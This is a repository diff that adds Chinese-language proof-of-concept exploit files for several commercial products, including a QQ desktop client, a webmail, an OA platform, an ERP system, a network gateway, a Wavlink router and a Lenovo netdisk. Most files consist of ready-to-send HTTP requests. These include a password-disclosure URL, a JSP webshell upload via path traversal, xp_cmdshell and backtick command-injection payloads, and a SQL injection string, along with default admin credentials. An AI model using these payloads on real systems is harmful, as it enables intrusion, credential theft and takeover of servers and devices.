add

QQ桌面客户端远程执行.md

@@ -0,0 +1,30 @@
+来源： [WIN哥学安全](javascript:void(0);)
+
+漏洞简介
+
+​    2023年8月20日，赛博昆仑捕获到利用QQ桌面客户端远程执行的漏洞，该漏洞为逻辑漏洞，攻击者可以利用该漏洞在QQ客户端上进行无需用户确认文件下载执行为，当用户点击消息链接时，QQ客户端会自动下载并打开文件，最终实现远程代码执行的目的。建议谨慎点击任何消息链接。
+
+
+
+影响版本
+
+```
+QQ Windows版9.7.13及以前版本
+```
+
+
+漏洞复现
+
+A发送恶意文件给A。
+
+![image-20230822091243864](./QQ桌面客户端远程执行.assets/image-20230822091243864.png)
+
+A在手机上回复此恶意文件
+
+![image-20230822091253944](./QQ桌面客户端远程执行.assets/image-20230822091253944.png)
+
+A在电脑上将此回复转发给B
+
+B点击直接上线。
+
+![image-20230822091305578](./QQ桌面客户端远程执行.assets/image-20230822091305578.png)

README.md

@@ -2,6 +2,26 @@
 
 由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。所涉及工具来自网络，安全性自测。
 
+
+
+# 8月22新增
+
+QQ桌面客户端远程执行
+
+禅道18.0~18.3 backstage命令注入
+
+联想网盘存在任意文件上传漏洞
+
+企望制造 ERP comboxstore.action 远程命令执行漏洞
+
+万户协同办公平台存在未授权访问漏洞
+
+万户协同办公平台接口存在文件上传漏洞
+
+WEBMAIL存在任意用户登录漏洞
+
+360 新天擎终端安全管理系统信息泄露漏洞
+
 # 8月17新增
 
 亿赛通电子文档安全管理系统远程命令执行漏洞

WEBMAIL存在任意用户登录漏洞.md

@@ -0,0 +1,10 @@
+```
+RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin
+回显errormsg为密码
+用户名为 admin
+添加头 X-Forwarded-For: 127.0.0.1
+
+如果有登录失败的话，使用
+/RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin@+证书 or 根域名获取 errormsg 登录
+```
+

万户协同办公平台存在未授权访问漏洞.md

@@ -0,0 +1,4 @@
+```
+GET /defaultroot/evoInterfaceServlet?paramType=user
+```
+

万户协同办公平台接口存在文件上传漏洞.md

@@ -0,0 +1,19 @@
+```
+POST
+/defaultroot/wpsservlet?option=saveNewFile&newdocld=jsp&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
+Host:xxx.xxx.xxx.xxx
+User-Agent:
+Content-Length:266
+Cache-Control:max-age=0
+Content-Type:multipart/form-data;boundary=803e058d60f347f7b3c17fa95228eca6
+Accept-Encoding: gzip,deflate
+Connection:close
+
+--221e166d60f34112b3c17fa95818ecfe
+Content-Disposition:form-data;name="NewFile";filename="jsp.jsp"
+
+<% jsp 上传的木马地址 %>
+
+--221e166d60f34112b3c17fa95818ecfe--
+```
+

企望制造 ERP comboxstore.action 远程命令执行漏洞.md

@@ -0,0 +1,8 @@
+```
+POST /mainFunctions/comboxstore.action HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+Host: xxx.xxx.xxx.xxx
+
+comboxsql=exec%20xp_cmdshell%20'type%20C:\Windows\Win.ini'
+```
+

用友时空 KSOA servletimagefield 文件 sKeyvalue 参数SQL 注入.md

@@ -1,3 +1,12 @@
+一、产品描述
+用友时空KSOA是建立在SOA理念指导下研发的新一代产品，是根据流通企业最前沿的I需求推出的统一的IT基础架构，它可以让流通企业各个时期建立的IT系统之间彼此轻松对话，帮助流通企业保护原有的IT投资，简化IT管理，提升竞争能力，确保企业整体的战略目标以及创新活动的实现。
+二、漏洞概述
+用友时空KSOA平台Taskrequestservlet处存在SQL注入。
+
+三、影响范围
+用友时空企业信息融通平台KSOA v9.0
+
+fofa: app="用友-时空KSOA"
 ```
 GET
 /servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1'+union+select+sys.fn_varbintohexstr(hashbytes('md5','test'))-

百卓Smart S85F管理系统 远程命令执行.md

@@ -0,0 +1,73 @@
+来源 不够安全
+
+***产品简介***
+
+百卓Smart S85F是Smart系列上网行为管理设备中的明星产品，它是专为中小型企业量身打造的专业级新品，它在功能设计方面充分考虑了中小型企业对网络设备高性价比的需求，将多种应用功能集于一身，包括网络应用封堵、流量控制、链路负载均衡、网页分类阻断、上网内容审计、防火墙、VPN等，可帮助企业有效减少网络建设成本、规范员工上网行为、提升网络带宽利用率、避免企业信息泄露、增强网络稳定性和安全性。
+
+![image-20230822090921649](./百卓Smart S85F管理系统 远程命令执行.assets/image-20230822090921649.png)
+
+***漏洞描述***
+
+北京百卓Smart S85F管理平台发现漏洞，漏洞编号为20230807，已被宣布为严重漏洞。受此漏洞影响的是文件/log/decodmail.php 的未知功能，对参数文件的操作会导致命令注入，攻击可以远程发起。
+
+***影响版本***
+
+```
+Smart S85F
+```
+
+***空间测绘***
+
+
+
+***漏洞利用***
+
+POC
+
+```
+
+# POC需要进行base64编码
+/etc/`sleep 5`.pcap
+L2V0Yy9gc2xlZXAgNWAucGNhcA==
+# 或者，下面是漏洞作者原版POC
+/etc/`sleep${IFS}10`.pcap
+L2V0Yy9gc2xlZXAke0lGU30xMGAucGNhcA==
+```
+
+```
+
+GET /log/decodmail.php?file=L2V0Yy9gc2xlZXAgNWAucGNhcA== HTTP/1.1
+Host: xxx.xxx.xxx:xxxx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxxxxx
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+```
+
+1.登录系统，默认账户密码：admin/admin
+
+![image-20230822090951037](./百卓Smart S85F管理系统 远程命令执行.assets/image-20230822090951037.png)
+
+2.替换Cookie，发送数据包
+
+```
+
+GET /log/decodmail.php?file=L2V0Yy9gc2xlZXAgNWAucGNhcA== HTTP/1.1
+Host: xxx.xxx.xxx:xxxx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxxxxx
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+```
+
+3.延时5s，命令执行成功
+
+![image-20230822091014049](./百卓Smart S85F管理系统 远程命令执行.assets/image-20230822091014049.png)

睿因Wavlink WL_WNJ575A3远程命令执行.md

@@ -0,0 +1,53 @@
+***简介***
+
+WL-WN575A3是一款便携式插入式Wi-Fi扩展器，双频扩展器搭配双频路由器，2.4GHz和5GHz信号同时发力，覆盖家中每个角落，让Wi-Fi无处不在。WL-WN575A3采用802.11AC双频技术，比标准802.11n速度快了3倍，提供高达300Mbps 2.4G 和 867Mbps 5GHz双频段的无线速率，观看4K电影，在线游戏影音，上网浏览图片，逛朋友圈，手机上网通通都不耽误。默认密码“admin”。文末获取空间测绘搜索语句。
+
+***漏洞描述***
+
+睿因Wavlink WL_WNJ575A3
+
+v.R75A3_V1410_220513 中的问题允许远程攻击者通过 adm.cgi 中 set_sys_adm 函数的用户名参数执行任意代码。
+
+***影响版本***
+
+- 
+
+```
+Wavlink WL_WNJ575A3 v.R75A3_V1410_220513
+```
+
+***漏洞代码***
+
+![image-20230821091241135](./睿因Wavlink WL_WNJ575A3远程命令执行.assets/image-20230821091241135.png)
+
+***漏洞利用***
+
+POC
+
+```
+
+POST /cgi-bin/adm.cgi HTTP/1.1
+Host: 192.168.10.1
+Content-Length: 91
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://192.168.10.1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://192.168.10.1/set_time.shtml?r=29725
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: session=1243623152
+Connection: close
+
+page=sysAdm&SYSPASS=password&username='`ls>/etc_ro/lighttpd/www/data.html`'&newpass=12345678
+```
+
+1.Burp发包执行命令
+
+![image-20230821091305300](./睿因Wavlink WL_WNJ575A3远程命令执行.assets/image-20230821091305300.png)
+
+2.访问“data.html”查看命令执行结果
+
+![image-20230821091314227](./睿因Wavlink WL_WNJ575A3远程命令执行.assets/image-20230821091314227.png)

联想网盘存在任意文件上传漏洞.md

@@ -0,0 +1,23 @@
+```
+POST /write?neid=1&hash=../../../../../../../dragonball/srv/tomcat/webapps/stream_server/ttt.txt&status=1 HTTP/1.1
+Host:xxxx
+Cache-Control:max-age=0
+Sec-Ch-Ua:"Chromium";v="117", "Not;A=Brand";v="8"
+Sec-Ch-Ua-Mobile:?0
+Sec-Ch-Ua-Platform:"Windows"
+Upgrade-Insecure-Requests:1
+User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
+Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site:none
+Sec-Fetch-Mode:navigate
+Sec-Fetch-User:?1
+Sec-Fetch-Dest:document
+Accept-Language:zh-CN,zh;q=0.9
+Connection:close
+Content-Type:application/octet-stream
+Accept-Encoding:gzip, deflate
+Content-Length:8
+
+Testtest
+```
+